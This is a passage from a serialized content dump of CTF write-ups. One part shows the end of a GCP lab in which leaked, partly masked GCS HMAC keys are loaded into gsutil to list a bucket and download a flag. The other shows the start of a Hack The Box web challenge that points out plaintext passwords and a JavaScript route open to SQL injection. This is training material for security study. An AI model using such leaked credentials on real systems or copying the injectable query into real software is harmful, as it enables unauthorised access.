--secret=payments",{"type":33,"tag":128,"props":4584,"children":4585},{"style":151},[4586],{"type":38,"value":4527},{"type":33,"tag":128,"props":4588,"children":4589},{"style":140},[4590],{"type":38,"value":3685},{"type":33,"tag":128,"props":4592,"children":4593},{"class":130,"line":988},[4594],{"type":33,"tag":128,"props":4595,"children":4596},{"style":135},[4597],{"type":38,"value":4598},"GOOG1E6CZ32****************************************\n",{"type":33,"tag":128,"props":4600,"children":4601},{"class":130,"line":1001},[4602],{"type":33,"tag":128,"props":4603,"children":4604},{"style":135},[4605],{"type":38,"value":4606},"Hh**************************************\n",{"type":33,"tag":47,"props":4608,"children":4609},{},[4610],{"type":38,"value":4611},"We can see that we have GCS keys. In the following section, we will detail what these keys are and how to use them.",{"type":33,"tag":40,"props":4613,"children":4615},{"id":4614},"gcs-hmac-keys-usage",[4616],{"type":38,"value":4617},"GCS HMAC keys usage",{"type":33,"tag":47,"props":4619,"children":4620},{},[4621],{"type":38,"value":4622},"HMAC (Hash-based Message Authentication Code) keys in Google Cloud Storage (GCS) are an authentication mechanism that allows applications to access GCS buckets using an HMAC-SHA256 cryptographic signature instead of OAuth2.",{"type":33,"tag":47,"props":4624,"children":4625},{},[4626],{"type":38,"value":4627},"They are often used for the following benefits:",{"type":33,"tag":239,"props":4629,"children":4630},{},[4631,4636,4641],{"type":33,"tag":243,"props":4632,"children":4633},{},[4634],{"type":38,"value":4635},"Compatible with AWS S3 SDKs and tools",{"type":33,"tag":243,"props":4637,"children":4638},{},[4639],{"type":38,"value":4640},"Useful for applications requiring authenticated REST access",{"type":33,"tag":243,"props":4642,"children":4643},{},[4644],{"type":38,"value":4645},"Allows access to GCS with tools that don't support 
OAuth",{"type":33,"tag":47,"props":4647,"children":4648},{},[4649,4651,4657,4659,4665,4667,4672,4674],{"type":38,"value":4650},"Each key consists of two parts: an ",{"type":33,"tag":105,"props":4652,"children":4654},{"className":4653},[],[4655],{"type":38,"value":4656},"access_key",{"type":38,"value":4658}," and a ",{"type":33,"tag":105,"props":4660,"children":4662},{"className":4661},[],[4663],{"type":38,"value":4664},"secret_key",{"type":38,"value":4666},". The ",{"type":33,"tag":105,"props":4668,"children":4670},{"className":4669},[],[4671],{"type":38,"value":4656},{"type":38,"value":4673}," has a very specific format that makes it easy to recognize, as it will begin with: ",{"type":33,"tag":105,"props":4675,"children":4677},{"className":4676},[],[4678],{"type":38,"value":4679},"GOOG....",{"type":33,"tag":47,"props":4681,"children":4682},{},[4683],{"type":38,"value":4684},"These keys can be used with the gsutil command:",{"type":33,"tag":114,"props":4686,"children":4687},{"lang":116},[4688],{"type":33,"tag":119,"props":4689,"children":4691},{"className":121,"code":4690,"language":116,"meta":8,"style":8},"$> gsutil config -a\nThis command will configure HMAC credentials, but gsutil will use\nOAuth2 credentials from the Cloud SDK by default. To make sure the\nHMAC credentials are used, run: \"gcloud config set\npass_credentials_to_gsutil false\".\n\nThis command will create a boto config file at /root/.boto containing\nyour credentials, based on your responses to the following questions.\nWhat is your google access key ID? GOOG1E6CZ32****************************************\nWhat is your google secret access key? 
Hh**************************************\n",[4692],{"type":33,"tag":105,"props":4693,"children":4694},{"__ignoreMap":8},[4695,4720,4771,4833,4869,4886,4893,4946,4997,5043],{"type":33,"tag":128,"props":4696,"children":4697},{"class":130,"line":131},[4698,4702,4706,4711,4715],{"type":33,"tag":128,"props":4699,"children":4700},{"style":135},[4701],{"type":38,"value":3651},{"type":33,"tag":128,"props":4703,"children":4704},{"style":323},[4705],{"type":38,"value":3656},{"type":33,"tag":128,"props":4707,"children":4708},{"style":140},[4709],{"type":38,"value":4710},"gsutil",{"type":33,"tag":128,"props":4712,"children":4713},{"style":140},[4714],{"type":38,"value":181},{"type":33,"tag":128,"props":4716,"children":4717},{"style":151},[4718],{"type":38,"value":4719}," -a\n",{"type":33,"tag":128,"props":4721,"children":4722},{"class":130,"line":362},[4723,4728,4733,4737,4742,4747,4752,4757,4762,4766],{"type":33,"tag":128,"props":4724,"children":4725},{"style":135},[4726],{"type":38,"value":4727},"This",{"type":33,"tag":128,"props":4729,"children":4730},{"style":140},[4731],{"type":38,"value":4732}," command",{"type":33,"tag":128,"props":4734,"children":4735},{"style":140},[4736],{"type":38,"value":3726},{"type":33,"tag":128,"props":4738,"children":4739},{"style":140},[4740],{"type":38,"value":4741}," configure",{"type":33,"tag":128,"props":4743,"children":4744},{"style":140},[4745],{"type":38,"value":4746}," HMAC",{"type":33,"tag":128,"props":4748,"children":4749},{"style":140},[4750],{"type":38,"value":4751}," credentials,",{"type":33,"tag":128,"props":4753,"children":4754},{"style":140},[4755],{"type":38,"value":4756}," but",{"type":33,"tag":128,"props":4758,"children":4759},{"style":140},[4760],{"type":38,"value":4761}," gsutil",{"type":33,"tag":128,"props":4763,"children":4764},{"style":140},[4765],{"type":38,"value":3726},{"type":33,"tag":128,"props":4767,"children":4768},{"style":140},[4769],{"type":38,"value":4770}," 
use\n",{"type":33,"tag":128,"props":4772,"children":4773},{"class":130,"line":403},[4774,4779,4784,4789,4794,4798,4803,4808,4813,4818,4823,4828],{"type":33,"tag":128,"props":4775,"children":4776},{"style":135},[4777],{"type":38,"value":4778},"OAuth2",{"type":33,"tag":128,"props":4780,"children":4781},{"style":140},[4782],{"type":38,"value":4783}," credentials",{"type":33,"tag":128,"props":4785,"children":4786},{"style":140},[4787],{"type":38,"value":4788}," from",{"type":33,"tag":128,"props":4790,"children":4791},{"style":140},[4792],{"type":38,"value":4793}," the",{"type":33,"tag":128,"props":4795,"children":4796},{"style":140},[4797],{"type":38,"value":3990},{"type":33,"tag":128,"props":4799,"children":4800},{"style":140},[4801],{"type":38,"value":4802}," SDK",{"type":33,"tag":128,"props":4804,"children":4805},{"style":140},[4806],{"type":38,"value":4807}," by",{"type":33,"tag":128,"props":4809,"children":4810},{"style":140},[4811],{"type":38,"value":4812}," default.",{"type":33,"tag":128,"props":4814,"children":4815},{"style":140},[4816],{"type":38,"value":4817}," To",{"type":33,"tag":128,"props":4819,"children":4820},{"style":140},[4821],{"type":38,"value":4822}," make",{"type":33,"tag":128,"props":4824,"children":4825},{"style":140},[4826],{"type":38,"value":4827}," sure",{"type":33,"tag":128,"props":4829,"children":4830},{"style":140},[4831],{"type":38,"value":4832}," the\n",{"type":33,"tag":128,"props":4834,"children":4835},{"class":130,"line":739},[4836,4841,4845,4850,4855,4860,4864],{"type":33,"tag":128,"props":4837,"children":4838},{"style":135},[4839],{"type":38,"value":4840},"HMAC",{"type":33,"tag":128,"props":4842,"children":4843},{"style":140},[4844],{"type":38,"value":4783},{"type":33,"tag":128,"props":4846,"children":4847},{"style":140},[4848],{"type":38,"value":4849}," are",{"type":33,"tag":128,"props":4851,"children":4852},{"style":140},[4853],{"type":38,"value":4854}," 
used,",{"type":33,"tag":128,"props":4856,"children":4857},{"style":140},[4858],{"type":38,"value":4859}," run:",{"type":33,"tag":128,"props":4861,"children":4862},{"style":676},[4863],{"type":38,"value":679},{"type":33,"tag":128,"props":4865,"children":4866},{"style":140},[4867],{"type":38,"value":4868},"gcloud config set\n",{"type":33,"tag":128,"props":4870,"children":4871},{"class":130,"line":765},[4872,4877,4881],{"type":33,"tag":128,"props":4873,"children":4874},{"style":140},[4875],{"type":38,"value":4876},"pass_credentials_to_gsutil false",{"type":33,"tag":128,"props":4878,"children":4879},{"style":676},[4880],{"type":38,"value":669},{"type":33,"tag":128,"props":4882,"children":4883},{"style":140},[4884],{"type":38,"value":4885},".\n",{"type":33,"tag":128,"props":4887,"children":4888},{"class":130,"line":804},[4889],{"type":33,"tag":128,"props":4890,"children":4891},{"emptyLinePlaceholder":896},[4892],{"type":38,"value":899},{"type":33,"tag":128,"props":4894,"children":4895},{"class":130,"line":839},[4896,4900,4904,4908,4913,4917,4922,4926,4931,4936,4941],{"type":33,"tag":128,"props":4897,"children":4898},{"style":135},[4899],{"type":38,"value":4727},{"type":33,"tag":128,"props":4901,"children":4902},{"style":140},[4903],{"type":38,"value":4732},{"type":33,"tag":128,"props":4905,"children":4906},{"style":140},[4907],{"type":38,"value":3726},{"type":33,"tag":128,"props":4909,"children":4910},{"style":140},[4911],{"type":38,"value":4912}," create",{"type":33,"tag":128,"props":4914,"children":4915},{"style":140},[4916],{"type":38,"value":3736},{"type":33,"tag":128,"props":4918,"children":4919},{"style":140},[4920],{"type":38,"value":4921}," boto",{"type":33,"tag":128,"props":4923,"children":4924},{"style":140},[4925],{"type":38,"value":181},{"type":33,"tag":128,"props":4927,"children":4928},{"style":140},[4929],{"type":38,"value":4930}," file",{"type":33,"tag":128,"props":4932,"children":4933},{"style":140},[4934],{"type":38,"value":4935}," 
at",{"type":33,"tag":128,"props":4937,"children":4938},{"style":140},[4939],{"type":38,"value":4940}," /root/.boto",{"type":33,"tag":128,"props":4942,"children":4943},{"style":140},[4944],{"type":38,"value":4945}," containing\n",{"type":33,"tag":128,"props":4947,"children":4948},{"class":130,"line":848},[4949,4954,4958,4963,4968,4973,4978,4983,4987,4992],{"type":33,"tag":128,"props":4950,"children":4951},{"style":135},[4952],{"type":38,"value":4953},"your",{"type":33,"tag":128,"props":4955,"children":4956},{"style":140},[4957],{"type":38,"value":4751},{"type":33,"tag":128,"props":4959,"children":4960},{"style":140},[4961],{"type":38,"value":4962}," based",{"type":33,"tag":128,"props":4964,"children":4965},{"style":140},[4966],{"type":38,"value":4967}," on",{"type":33,"tag":128,"props":4969,"children":4970},{"style":140},[4971],{"type":38,"value":4972}," your",{"type":33,"tag":128,"props":4974,"children":4975},{"style":140},[4976],{"type":38,"value":4977}," responses",{"type":33,"tag":128,"props":4979,"children":4980},{"style":140},[4981],{"type":38,"value":4982}," to",{"type":33,"tag":128,"props":4984,"children":4985},{"style":140},[4986],{"type":38,"value":4793},{"type":33,"tag":128,"props":4988,"children":4989},{"style":140},[4990],{"type":38,"value":4991}," following",{"type":33,"tag":128,"props":4993,"children":4994},{"style":140},[4995],{"type":38,"value":4996}," questions.\n",{"type":33,"tag":128,"props":4998,"children":4999},{"class":130,"line":976},[5000,5005,5010,5014,5019,5023,5028,5033,5038],{"type":33,"tag":128,"props":5001,"children":5002},{"style":135},[5003],{"type":38,"value":5004},"What",{"type":33,"tag":128,"props":5006,"children":5007},{"style":140},[5008],{"type":38,"value":5009}," is",{"type":33,"tag":128,"props":5011,"children":5012},{"style":140},[5013],{"type":38,"value":4972},{"type":33,"tag":128,"props":5015,"children":5016},{"style":140},[5017],{"type":38,"value":5018}," 
google",{"type":33,"tag":128,"props":5020,"children":5021},{"style":140},[5022],{"type":38,"value":4512},{"type":33,"tag":128,"props":5024,"children":5025},{"style":140},[5026],{"type":38,"value":5027}," key",{"type":33,"tag":128,"props":5029,"children":5030},{"style":140},[5031],{"type":38,"value":5032}," ID?",{"type":33,"tag":128,"props":5034,"children":5035},{"style":140},[5036],{"type":38,"value":5037}," GOOG1E6CZ32",{"type":33,"tag":128,"props":5039,"children":5040},{"style":151},[5041],{"type":38,"value":5042},"****************************************\n",{"type":33,"tag":128,"props":5044,"children":5045},{"class":130,"line":988},[5046,5050,5054,5058,5062,5067,5071,5076,5081],{"type":33,"tag":128,"props":5047,"children":5048},{"style":135},[5049],{"type":38,"value":5004},{"type":33,"tag":128,"props":5051,"children":5052},{"style":140},[5053],{"type":38,"value":5009},{"type":33,"tag":128,"props":5055,"children":5056},{"style":140},[5057],{"type":38,"value":4972},{"type":33,"tag":128,"props":5059,"children":5060},{"style":140},[5061],{"type":38,"value":5018},{"type":33,"tag":128,"props":5063,"children":5064},{"style":140},[5065],{"type":38,"value":5066}," secret",{"type":33,"tag":128,"props":5068,"children":5069},{"style":140},[5070],{"type":38,"value":4512},{"type":33,"tag":128,"props":5072,"children":5073},{"style":140},[5074],{"type":38,"value":5075}," key?",{"type":33,"tag":128,"props":5077,"children":5078},{"style":140},[5079],{"type":38,"value":5080}," Hh",{"type":33,"tag":128,"props":5082,"children":5083},{"style":151},[5084],{"type":38,"value":5085},"**************************************\n",{"type":33,"tag":47,"props":5087,"children":5088},{},[5089,5091],{"type":38,"value":5090},"Once the keys are imported, it is possible to list the contents of the bucket that was also in the secrets: 
",{"type":33,"tag":105,"props":5092,"children":5094},{"className":5093},[],[5095],{"type":38,"value":5096},"gr-stripe",{"type":33,"tag":114,"props":5098,"children":5099},{"lang":116},[5100],{"type":33,"tag":119,"props":5101,"children":5103},{"className":121,"code":5102,"language":116,"meta":8,"style":8},"$> gsutil ls -r gs://gr-stripe\ngs://gr-stripe/flag.txt\ngs://gr-stripe/transfer/:\ngs://gr-stripe/transfer/\ngs://gr-stripe/transfer/stripe-fetch.js\n",[5104],{"type":33,"tag":105,"props":5105,"children":5106},{"__ignoreMap":8},[5107,5136,5144,5152,5160],{"type":33,"tag":128,"props":5108,"children":5109},{"class":130,"line":131},[5110,5114,5118,5122,5127,5131],{"type":33,"tag":128,"props":5111,"children":5112},{"style":135},[5113],{"type":38,"value":3651},{"type":33,"tag":128,"props":5115,"children":5116},{"style":323},[5117],{"type":38,"value":3656},{"type":33,"tag":128,"props":5119,"children":5120},{"style":140},[5121],{"type":38,"value":4710},{"type":33,"tag":128,"props":5123,"children":5124},{"style":140},[5125],{"type":38,"value":5126}," ls",{"type":33,"tag":128,"props":5128,"children":5129},{"style":151},[5130],{"type":38,"value":2992},{"type":33,"tag":128,"props":5132,"children":5133},{"style":140},[5134],{"type":38,"value":5135}," 
gs://gr-stripe\n",{"type":33,"tag":128,"props":5137,"children":5138},{"class":130,"line":362},[5139],{"type":33,"tag":128,"props":5140,"children":5141},{"style":135},[5142],{"type":38,"value":5143},"gs://gr-stripe/flag.txt\n",{"type":33,"tag":128,"props":5145,"children":5146},{"class":130,"line":403},[5147],{"type":33,"tag":128,"props":5148,"children":5149},{"style":135},[5150],{"type":38,"value":5151},"gs://gr-stripe/transfer/:\n",{"type":33,"tag":128,"props":5153,"children":5154},{"class":130,"line":739},[5155],{"type":33,"tag":128,"props":5156,"children":5157},{"style":135},[5158],{"type":38,"value":5159},"gs://gr-stripe/transfer/\n",{"type":33,"tag":128,"props":5161,"children":5162},{"class":130,"line":765},[5163],{"type":33,"tag":128,"props":5164,"children":5165},{"style":135},[5166],{"type":38,"value":5167},"gs://gr-stripe/transfer/stripe-fetch.js\n",{"type":33,"tag":47,"props":5169,"children":5170},{},[5171,5173,5179],{"type":38,"value":5172},"We can see that we have a file called ",{"type":33,"tag":105,"props":5174,"children":5176},{"className":5175},[],[5177],{"type":38,"value":5178},"flag.txt",{"type":38,"value":5180}," in the bucket, so we can download it using the following command:",{"type":33,"tag":114,"props":5182,"children":5183},{"lang":116},[5184],{"type":33,"tag":119,"props":5185,"children":5187},{"className":121,"code":5186,"language":116,"meta":8,"style":8},"$> gsutil cp gs://gr-stripe/flag.txt 
.\n",[5188],{"type":33,"tag":105,"props":5189,"children":5190},{"__ignoreMap":8},[5191],{"type":33,"tag":128,"props":5192,"children":5193},{"class":130,"line":131},[5194,5198,5202,5206,5211,5216],{"type":33,"tag":128,"props":5195,"children":5196},{"style":135},[5197],{"type":38,"value":3651},{"type":33,"tag":128,"props":5199,"children":5200},{"style":323},[5201],{"type":38,"value":3656},{"type":33,"tag":128,"props":5203,"children":5204},{"style":140},[5205],{"type":38,"value":4710},{"type":33,"tag":128,"props":5207,"children":5208},{"style":140},[5209],{"type":38,"value":5210}," cp",{"type":33,"tag":128,"props":5212,"children":5213},{"style":140},[5214],{"type":38,"value":5215}," gs://gr-stripe/flag.txt",{"type":33,"tag":128,"props":5217,"children":5218},{"style":140},[5219],{"type":38,"value":5220}," .\n",{"type":33,"tag":47,"props":5222,"children":5223},{},[5224],{"type":38,"value":5225},"And there we have the flag :D",{"type":33,"tag":5227,"props":5228,"children":5229},"style",{},[5230],{"type":38,"value":5231},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: 
var(--shiki-default-text-decoration);}",{"title":8,"searchDepth":362,"depth":131,"links":5233},[5234,5235,5236,5237,5238,5239],{"id":42,"depth":362,"text":45},{"id":65,"depth":362,"text":68},{"id":448,"depth":362,"text":451},{"id":1810,"depth":362,"text":1813},{"id":2292,"depth":362,"text":2295},{"id":4614,"depth":362,"text":4617},"markdown","content:writeups:pwnedlabs-gcp-challenge.md","content","writeups/pwnedlabs-gcp-challenge.md","writeups/pwnedlabs-gcp-challenge","md",{"_path":5247,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":5248,"description":8,"head":5249,"body":5269,"_type":5240,"_id":11489,"_source":5242,"_file":11490,"_stem":11491,"_extension":5245},"/writeups/aurors-archive","Aurors Archive",{"title":5250,"description":5251,"keywords":5252,"slug":5253,"image":5254,"date":5255,"meta":5256},"Aurors Archive [UNINTENDED]","Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025","web,xss,postgreSQL,RCE","aurors-archive","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102251/writeups/cyber_apocalypse_2025.webp","2025-03-25",[5257,5259,5261,5262,5263,5265,5266,5267],{"og:description":5258},"Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025.",{"og:title":5260},"Aurors Archive writeup 
[UNINTENDED]",{"og:image":5254},{"og:type":21},{"og:url":5264},"https://owalid.com/writeups/aurors-archive",{"description":5258},{"title":5260},{"keywords":5268},"web,xss,postgreSQL,RCE,hackthebox,htb,ctf",{"type":30,"children":5270,"toc":11483},[5271,5275,5279,5284,5296,5301,5306,5490,5496,5501,5506,5510,5515,5519,5524,5903,5908,5914,5927,6246,6251,6368,6380,6384,6389,7224,7229,7324,7336,7507,7512,7516,7521,7526,7531,7725,7730,7734,7739,7858,7862,7866,7871,7991,7996,8429,8434,8600,8605,8609,8614,8619,8625,8630,8816,8829,8834,8863,8868,8873,8931,8943,9032,9061,9066,9928,9941,10215,10220,10225,11463,11475,11479],{"type":33,"tag":34,"props":5272,"children":5273},{"id":5253},[5274],{"type":38,"value":5248},{"type":33,"tag":40,"props":5276,"children":5277},{"id":42},[5278],{"type":38,"value":45},{"type":33,"tag":47,"props":5280,"children":5281},{},[5282],{"type":38,"value":5283},"Batchcraft potions is a hard challenge from the Cyber Apocalypse CTF 2025.",{"type":33,"tag":47,"props":5285,"children":5286},{},[5287,5289,5295],{"type":38,"value":5288},"The goal of this challenge is to have a RCE on the server and read the flag with the binary ",{"type":33,"tag":105,"props":5290,"children":5292},{"className":5291},[],[5293],{"type":38,"value":5294},"/readflag",{"type":38,"value":215},{"type":33,"tag":47,"props":5297,"children":5298},{},[5299],{"type":38,"value":5300},"We can see below the architecture of the challenge:",{"type":33,"tag":75,"props":5302,"children":5305},{"imgSrc":5303,":width":5304},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102366/writeups/aurors-archive/architecture.webp","330",[],{"type":33,"tag":239,"props":5307,"children":5308},{},[5309,5387,5421,5443,5472],{"type":33,"tag":243,"props":5310,"children":5311},{},[5312,5317,5319],{"type":33,"tag":2302,"props":5313,"children":5314},{},[5315],{"type":38,"value":5316},"User 
Pages",{"type":38,"value":5318},":\n",{"type":33,"tag":239,"props":5320,"children":5321},{},[5322,5335,5348,5361,5374],{"type":33,"tag":243,"props":5323,"children":5324},{},[5325,5327,5333],{"type":38,"value":5326},"Dashboard (",{"type":33,"tag":105,"props":5328,"children":5330},{"className":5329},[],[5331],{"type":38,"value":5332},"dashboard.html",{"type":38,"value":5334},"): Displays ongoing auctions.",{"type":33,"tag":243,"props":5336,"children":5337},{},[5338,5340,5346],{"type":38,"value":5339},"My Submissions (",{"type":33,"tag":105,"props":5341,"children":5343},{"className":5342},[],[5344],{"type":38,"value":5345},"my_submissions.html",{"type":38,"value":5347},"): Lists resources submitted by the user.",{"type":33,"tag":243,"props":5349,"children":5350},{},[5351,5353,5359],{"type":38,"value":5352},"My Bids (",{"type":33,"tag":105,"props":5354,"children":5356},{"className":5355},[],[5357],{"type":38,"value":5358},"my_bids.html",{"type":38,"value":5360},"): Lists auctions where the user has placed bids.",{"type":33,"tag":243,"props":5362,"children":5363},{},[5364,5366,5372],{"type":38,"value":5365},"Submit Resource (",{"type":33,"tag":105,"props":5367,"children":5369},{"className":5368},[],[5370],{"type":38,"value":5371},"submit.html",{"type":38,"value":5373},"): Allows submission of a new resource.",{"type":33,"tag":243,"props":5375,"children":5376},{},[5377,5379,5385],{"type":38,"value":5378},"Auction Details (",{"type":33,"tag":105,"props":5380,"children":5382},{"className":5381},[],[5383],{"type":38,"value":5384},"auction_details.html",{"type":38,"value":5386},"): Displays details of a specific auction.",{"type":33,"tag":243,"props":5388,"children":5389},{},[5390,5402,5403],{"type":33,"tag":2302,"props":5391,"children":5392},{},[5393,5395,5401],{"type":38,"value":5394},"REST API 
(",{"type":33,"tag":105,"props":5396,"children":5398},{"className":5397},[],[5399],{"type":38,"value":5400},"routes/api.js",{"type":38,"value":2966},{"type":38,"value":5318},{"type":33,"tag":239,"props":5404,"children":5405},{},[5406,5411,5416],{"type":33,"tag":243,"props":5407,"children":5408},{},[5409],{"type":38,"value":5410},"Authentication (login, OAuth).",{"type":33,"tag":243,"props":5412,"children":5413},{},[5414],{"type":38,"value":5415},"Management of submissions, auctions and bids.",{"type":33,"tag":243,"props":5417,"children":5418},{},[5419],{"type":38,"value":5420},"Integration with a Puppeteer bot to visit submitted URLs.",{"type":33,"tag":243,"props":5422,"children":5423},{},[5424,5429,5430],{"type":33,"tag":2302,"props":5425,"children":5426},{},[5427],{"type":38,"value":5428},"Database (db.js)",{"type":38,"value":5318},{"type":33,"tag":239,"props":5431,"children":5432},{},[5433,5438],{"type":33,"tag":243,"props":5434,"children":5435},{},[5436],{"type":38,"value":5437},"PostgreSQL is used to store users, submissions, auctions and bids.",{"type":33,"tag":243,"props":5439,"children":5440},{},[5441],{"type":38,"value":5442},"Functions allow creating, reading, updating and deleting data.",{"type":33,"tag":243,"props":5444,"children":5445},{},[5446,5458,5459],{"type":33,"tag":2302,"props":5447,"children":5448},{},[5449,5451,5457],{"type":38,"value":5450},"Admin Panel (",{"type":33,"tag":105,"props":5452,"children":5454},{"className":5453},[],[5455],{"type":38,"value":5456},"admin.html",{"type":38,"value":2966},{"type":38,"value":5318},{"type":33,"tag":239,"props":5460,"children":5461},{},[5462,5467],{"type":33,"tag":243,"props":5463,"children":5464},{},[5465],{"type":38,"value":5466},"Accessible only by the \"admin\" user.",{"type":33,"tag":243,"props":5468,"children":5469},{},[5470],{"type":38,"value":5471},"Allows viewing database 
tables.",{"type":33,"tag":243,"props":5473,"children":5474},{},[5475,5480,5482],{"type":33,"tag":2302,"props":5476,"children":5477},{},[5478],{"type":38,"value":5479},"Bot Puppeteer",{"type":38,"value":5481}," :\n",{"type":33,"tag":239,"props":5483,"children":5484},{},[5485],{"type":33,"tag":243,"props":5486,"children":5487},{},[5488],{"type":38,"value":5489},"Logs in as administrator to the site and visits submitted URLs to verify their content.",{"type":33,"tag":40,"props":5491,"children":5493},{"id":5492},"admin-part",[5494],{"type":38,"value":5495},"Admin part",{"type":33,"tag":47,"props":5497,"children":5498},{},[5499],{"type":38,"value":5500},"We will see on this section the admin part of the website. We can change the password of the admin in the source code to better understand the challenge.",{"type":33,"tag":47,"props":5502,"children":5503},{},[5504],{"type":38,"value":5505},"We can see that once authenticated as admin, we have access to the admin section, where it is possible to read the database information.",{"type":33,"tag":75,"props":5507,"children":5509},{"imgSrc":5508},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/admin_preview.webp",[],{"type":33,"tag":47,"props":5511,"children":5512},{},[5513],{"type":38,"value":5514},"We can quickly see that the password field in the users table is not encrypted:",{"type":33,"tag":75,"props":5516,"children":5518},{"imgSrc":5517},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/users_table.webp",[],{"type":33,"tag":47,"props":5520,"children":5521},{},[5522],{"type":38,"value":5523},"Additionally, we can see in the route that retrieves the database information that there is an SQL injection present, we will examine this in the next 
section:",{"type":33,"tag":114,"props":5525,"children":5527},{"lang":5526},"js",[5528],{"type":33,"tag":119,"props":5529,"children":5532},{"className":5530,"code":5531,"language":5526,"meta":8,"style":8},"language-js shiki shiki-themes vitesse-dark","// New Endpoint: Get all records from a specified table (POST version)\nrouter.post(\"/table\", isAdmin, async (req, res) => {\n  const { tableName } = req.body;\n  try {\n    const query = `SELECT * FROM \"${tableName}\"`;\n\n    [..SNIP...]\n\n    const results = await runReadOnlyQuery(query);\n    res.json({ success: true, results });\n  }\n  [..SNIP...]\n  \n});\n",[5533],{"type":33,"tag":105,"props":5534,"children":5535},{"__ignoreMap":8},[5536,5545,5630,5677,5689,5744,5751,5769,5776,5816,5864,5871,5887,5895],{"type":33,"tag":128,"props":5537,"children":5538},{"class":130,"line":131},[5539],{"type":33,"tag":128,"props":5540,"children":5542},{"style":5541},"--shiki-default:#758575DD",[5543],{"type":38,"value":5544},"// New Endpoint: Get all records from a specified table (POST 
version)\n",{"type":33,"tag":128,"props":5546,"children":5547},{"class":130,"line":362},[5548,5553,5557,5562,5567,5571,5576,5580,5585,5590,5594,5599,5603,5608,5612,5617,5621,5626],{"type":33,"tag":128,"props":5549,"children":5550},{"style":306},[5551],{"type":38,"value":5552},"router",{"type":33,"tag":128,"props":5554,"children":5555},{"style":312},[5556],{"type":38,"value":215},{"type":33,"tag":128,"props":5558,"children":5559},{"style":135},[5560],{"type":38,"value":5561},"post",{"type":33,"tag":128,"props":5563,"children":5564},{"style":312},[5565],{"type":38,"value":5566},"(",{"type":33,"tag":128,"props":5568,"children":5569},{"style":676},[5570],{"type":38,"value":669},{"type":33,"tag":128,"props":5572,"children":5573},{"style":140},[5574],{"type":38,"value":5575},"/table",{"type":33,"tag":128,"props":5577,"children":5578},{"style":676},[5579],{"type":38,"value":669},{"type":33,"tag":128,"props":5581,"children":5582},{"style":312},[5583],{"type":38,"value":5584},",",{"type":33,"tag":128,"props":5586,"children":5587},{"style":306},[5588],{"type":38,"value":5589}," isAdmin",{"type":33,"tag":128,"props":5591,"children":5592},{"style":312},[5593],{"type":38,"value":5584},{"type":33,"tag":128,"props":5595,"children":5596},{"style":300},[5597],{"type":38,"value":5598}," async",{"type":33,"tag":128,"props":5600,"children":5601},{"style":312},[5602],{"type":38,"value":2852},{"type":33,"tag":128,"props":5604,"children":5605},{"style":306},[5606],{"type":38,"value":5607},"req",{"type":33,"tag":128,"props":5609,"children":5610},{"style":312},[5611],{"type":38,"value":5584},{"type":33,"tag":128,"props":5613,"children":5614},{"style":306},[5615],{"type":38,"value":5616}," res",{"type":33,"tag":128,"props":5618,"children":5619},{"style":312},[5620],{"type":38,"value":2966},{"type":33,"tag":128,"props":5622,"children":5623},{"style":312},[5624],{"type":38,"value":5625}," 
=>",{"type":33,"tag":128,"props":5627,"children":5628},{"style":312},[5629],{"type":38,"value":762},{"type":33,"tag":128,"props":5631,"children":5632},{"class":130,"line":403},[5633,5638,5643,5648,5653,5658,5663,5667,5672],{"type":33,"tag":128,"props":5634,"children":5635},{"style":300},[5636],{"type":38,"value":5637},"  const",{"type":33,"tag":128,"props":5639,"children":5640},{"style":312},[5641],{"type":38,"value":5642}," {",{"type":33,"tag":128,"props":5644,"children":5645},{"style":306},[5646],{"type":38,"value":5647}," tableName",{"type":33,"tag":128,"props":5649,"children":5650},{"style":312},[5651],{"type":38,"value":5652}," }",{"type":33,"tag":128,"props":5654,"children":5655},{"style":312},[5656],{"type":38,"value":5657}," =",{"type":33,"tag":128,"props":5659,"children":5660},{"style":306},[5661],{"type":38,"value":5662}," req",{"type":33,"tag":128,"props":5664,"children":5665},{"style":312},[5666],{"type":38,"value":215},{"type":33,"tag":128,"props":5668,"children":5669},{"style":306},[5670],{"type":38,"value":5671},"body",{"type":33,"tag":128,"props":5673,"children":5674},{"style":312},[5675],{"type":38,"value":5676},";\n",{"type":33,"tag":128,"props":5678,"children":5679},{"class":130,"line":739},[5680,5685],{"type":33,"tag":128,"props":5681,"children":5682},{"style":1576},[5683],{"type":38,"value":5684},"  try",{"type":33,"tag":128,"props":5686,"children":5687},{"style":312},[5688],{"type":38,"value":762},{"type":33,"tag":128,"props":5690,"children":5691},{"class":130,"line":765},[5692,5697,5702,5706,5711,5716,5721,5726,5731,5735,5740],{"type":33,"tag":128,"props":5693,"children":5694},{"style":300},[5695],{"type":38,"value":5696},"    const",{"type":33,"tag":128,"props":5698,"children":5699},{"style":306},[5700],{"type":38,"value":5701}," query",{"type":33,"tag":128,"props":5703,"children":5704},{"style":312},[5705],{"type":38,"value":5657},{"type":33,"tag":128,"props":5707,"children":5708},{"style":676},[5709],{"type":38,"value":5710}," 
